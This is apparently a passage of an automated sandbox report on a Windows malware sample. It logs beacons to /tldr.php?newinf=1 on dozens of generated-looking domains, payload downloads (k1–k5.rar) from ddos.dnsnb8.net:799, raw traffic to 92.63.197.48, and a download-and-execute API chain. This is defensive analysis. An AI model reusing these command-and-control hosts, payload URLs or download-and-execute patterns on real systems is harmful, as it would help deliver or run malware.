        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.com
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.com
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.bizCookie: btst=5c4753b361b1eb941ef57a8440589e30|8.46.123.33|1721913364|1721913364|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.bizCookie: btst=4fd2a6dbe45ae70787377705520077bb|8.46.123.33|1721913370|1721913370|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.bizCookie: btst=d9572a018c7a18b1f9b47fbe62723bee|8.46.123.33|1721913373|1721913373|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.bizCookie: btst=439a750021572922cb918eec537366b2|8.46.123.33|1721913381|1721913381|0|1|0; snkz=8.46.123.33
        Source: unknownTCP traffic detected without corresponding DNS query: 92.63.197.48
        Source: unknownTCP traffic detected without corresponding DNS query: 92.63.197.48
        Source: unknownTCP traffic detected without corresponding DNS query: 92.63.197.48
        Source: unknownTCP traffic detected without corresponding DNS query: 92.63.197.48
        Source: unknownTCP traffic detected without corresponding DNS query: 92.63.197.48
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00402DF9 memset,memset,memset,memset,memset,_snwprintf,ExpandEnvironmentStringsW,GetTickCount,srand,memset,rand,rand,_snwprintf,InternetOpenW,InternetOpenUrlW,CreateWindowExW,CreateFileW,LoadImageA,WriteFile,CloseHandle,_snwprintf,DeleteFileW,Sleep,CloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,memset,rand,rand,_snwprintf,URLDownloadToFileW,memset,_snwprintf,DeleteFileW,Sleep,ExitThread,0_2_00402DF9
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnu.ru
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ww88.ssofhoseuegsgrfnu.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: 92.63.197.48
        Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.ru
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.ru
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fiiauediehduefuge.ru
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.su
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.su
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.in
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.in
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: iuirshriuisruruuf.in
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: nousiieiffgogogoo.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eofihsishihiursgu.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fuaiuebndieufeufu.com
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.com
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.com
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.bizCookie: btst=5c4753b361b1eb941ef57a8440589e30|8.46.123.33|1721913364|1721913364|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.bizCookie: btst=4fd2a6dbe45ae70787377705520077bb|8.46.123.33|1721913370|1721913370|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.bizCookie: btst=d9572a018c7a18b1f9b47fbe62723bee|8.46.123.33|1721913373|1721913373|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.bizCookie: btst=439a750021572922cb918eec537366b2|8.46.123.33|1721913381|1721913381|0|1|0; snkz=8.46.123.33
        Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
        Source: global trafficDNS traffic detected: DNS query: ssofhoseuegsgrfnu.ru
        Source: global trafficDNS traffic detected: DNS query: ww88.ssofhoseuegsgrfnu.ru
        Source: global trafficDNS traffic detected: DNS query: slpsrgpsrhojifdij.ru
        Source: global trafficDNS traffic detected: DNS query: aiiaiafrzrueuedur.ru
        Source: global trafficDNS traffic detected: DNS query: fuaiuebndieufeufu.ru
        Source: global trafficDNS traffic detected: DNS query: eiifngjfksisiufjf.ru
        Source: global trafficDNS traffic detected: DNS query: eoroooskfogihisrg.ru
        Source: global trafficDNS traffic detected: DNS query: noeuaoenriusfiruu.ru
        Source: global trafficDNS traffic detected: DNS query: iuirshriuisruruuf.ru
        Source: global trafficDNS traffic detected: DNS query: afeifieuuufufufuf.ru
        Source: global trafficDNS traffic detected: DNS query: srndndubsbsifurfd.ru
        Source: global trafficDNS traffic detected: DNS query: fiiauediehduefuge.ru
        Source: global trafficDNS traffic detected: DNS query: nousiieiffgogogoo.ru
        Source: global trafficDNS traffic detected: DNS query: fifiehsueuufidhfi.ru
        Source: global trafficDNS traffic detected: DNS query: eofihsishihiursgu.ru
        Source: global trafficDNS traffic detected: DNS query: nnososoosjfeuhueu.ru
        Source: global trafficDNS traffic detected: DNS query: ssofhoseuegsgrfnj.su
        Source: global trafficDNS traffic detected: DNS query: slpsrgpsrhojifdij.su
        Source: global trafficDNS traffic detected: DNS query: aiiaiafrzrueuedur.su
        Source: global trafficDNS traffic detected: DNS query: fuaiuebndieufeufu.su
        Source: global trafficDNS traffic detected: DNS query: eiifngjfksisiufjf.su
        Source: global trafficDNS traffic detected: DNS query: eoroooskfogihisrg.su
        Source: global trafficDNS traffic detected: DNS query: noeuaoenriusfiruu.su
        Source: global trafficDNS traffic detected: DNS query: iuirshriuisruruuf.su
        Source: global trafficDNS traffic detected: DNS query: afeifieuuufufufuf.su
        Source: global trafficDNS traffic detected: DNS query: srndndubsbsifurfd.su
        Source: global trafficDNS traffic detected: DNS query: fiiauediehduefuge.su
        Source: global trafficDNS traffic detected: DNS query: nousiieiffgogogoo.su
        Source: global trafficDNS traffic detected: DNS query: fifiehsueuufidhfi.su
        Source: global trafficDNS traffic detected: DNS query: eofihsishihiursgu.su
        Source: global trafficDNS traffic detected: DNS query: nnososoosjfeuhueu.su
        Source: global trafficDNS traffic detected: DNS query: ssofhoseuegsgrfnj.in
        Source: global trafficDNS traffic detected: DNS query: slpsrgpsrhojifdij.in
        Source: global trafficDNS traffic detected: DNS query: aiiaiafrzrueuedur.in
        Source: global trafficDNS traffic detected: DNS query: fuaiuebndieufeufu.in
        Source: global trafficDNS traffic detected: DNS query: eiifngjfksisiufjf.in
        Source: global trafficDNS traffic detected: DNS query: eoroooskfogihisrg.in
        Source: global trafficDNS traffic detected: DNS query: noeuaoenriusfiruu.in
        Source: global trafficDNS traffic detected: DNS query: iuirshriuisruruuf.in
        Source: global trafficDNS traffic detected: DNS query: afeifieuuufufufuf.in
        Source: global trafficDNS traffic detected: DNS query: srndndubsbsifurfd.in
        Source: global trafficDNS traffic detected: DNS query: fiiauediehduefuge.in
        Source: global trafficDNS traffic detected: DNS query: nousiieiffgogogoo.in
        Source: global trafficDNS traffic detected: DNS query: fifiehsueuufidhfi.in
        Source: global trafficDNS traffic detected: DNS query: eofihsishihiursgu.in
        Source: global trafficDNS traffic detected: DNS query: nnososoosjfeuhueu.in
        Source: global trafficDNS traffic detected: DNS query: ssofhoseuegsgrfnj.net
        Source: global trafficDNS traffic detected: DNS query: slpsrgpsrhojifdij.net
        Source: global trafficDNS traffic detected: DNS query: aiiaiafrzrueuedur.net
        Source: global trafficDNS traffic detected: DNS query: fuaiuebndieufeufu.net
        Source: global trafficDNS traffic detected: DNS query: eiifngjfksisiufjf.net
        Source: global trafficDNS traffic detected: DNS query: eoroooskfogihisrg.net
        Source: global trafficDNS traffic detected: DNS query: noeuaoenriusfiruu.net
        Source: global trafficDNS traffic detected: DNS query: iuirshriuisruruuf.net
        Source: global trafficDNS traffic detected: DNS query: afeifieuuufufufuf.net
        Source: global trafficDNS traffic detected: DNS query: srndndubsbsifurfd.net
        Source: global trafficDNS traffic detected: DNS query: fiiauediehduefuge.net
        Source: global trafficDNS traffic detected: DNS query: nousiieiffgogogoo.net
        Source: global trafficDNS traffic detected: DNS query: fifiehsueuufidhfi.net
        Source: global trafficDNS traffic detected: DNS query: eofihsishihiursgu.net
        Source: global trafficDNS traffic detected: DNS query: ssofhoseuegsgrfnj.biz
        Source: global trafficDNS traffic detected: DNS query: slpsrgpsrhojifdij.biz
        Source: global trafficDNS traffic detected: DNS query: aiiaiafrzrueuedur.biz
        Source: global trafficDNS traffic detected: DNS query: fuaiuebndieufeufu.biz
        Source: global trafficDNS traffic detected: DNS query: eiifngjfksisiufjf.biz
        Source: global trafficDNS traffic detected: DNS query: eoroooskfogihisrg.biz
        Source: global trafficDNS traffic detected: DNS query: noeuaoenriusfiruu.biz
        Source: global trafficDNS traffic detected: DNS query: iuirshriuisruruuf.biz
        Source: global trafficDNS traffic detected: DNS query: afeifieuuufufufuf.biz
        Source: global trafficDNS traffic detected: DNS query: srndndubsbsifurfd.biz
        Source: global trafficDNS traffic detected: DNS query: fiiauediehduefuge.biz
        Source: global trafficDNS traffic detected: DNS query: nousiieiffgogogoo.biz
        Source: global trafficDNS traffic detected: DNS query: fifiehsueuufidhfi.biz
        Source: global trafficDNS traffic detected: DNS query: eofihsishihiursgu.biz
        Source: global trafficDNS traffic detected: DNS query: nnososoosjfeuhueu.net
        Source: global trafficDNS traffic detected: DNS query: ssofhoseuegsgrfnj.com
        Source: global trafficDNS traffic detected: DNS query: slpsrgpsrhojifdij.com
        Source: global trafficDNS traffic detected: DNS query: aiiaiafrzrueuedur.com
        Source: global trafficDNS traffic detected: DNS query: fuaiuebndieufeufu.com
        Source: global trafficDNS traffic detected: DNS query: eiifngjfksisiufjf.com
        Source: global trafficDNS traffic detected: DNS query: eoroooskfogihisrg.com
        Source: global trafficDNS traffic detected: DNS query: noeuaoenriusfiruu.com
        Source: global trafficDNS traffic detected: DNS query: iuirshriuisruruuf.com
        Source: global trafficDNS traffic detected: DNS query: afeifieuuufufufuf.com
        Source: global trafficDNS traffic detected: DNS query: srndndubsbsifurfd.com
        Source: global trafficDNS traffic detected: DNS query: fiiauediehduefuge.com
        Source: global trafficDNS traffic detected: DNS query: nousiieiffgogogoo.com
        Source: global trafficDNS traffic detected: DNS query: fifiehsueuufidhfi.com
        Source: global trafficDNS traffic detected: DNS query: eofihsishihiursgu.com
        Source: global trafficDNS traffic detected: DNS query: nnososoosjfeuhueu.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 25 Jul 2024 13:15:22 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Jul 2024 13:15:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: XBVdJN.exe, 00000001.00000003.2323931441.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmp, XBVdJN.exe, 0000000A.00000003.2512646316.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmp, XBVdJN.exe, 0000000F.00000003.2791933518.0000000001780000.00000004.00001000.00020000.00000000.sdmp, XBVdJN.exe, 0000000F.00000002.2795274825.0000000000183000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://92.63.197.48/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.48/32
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 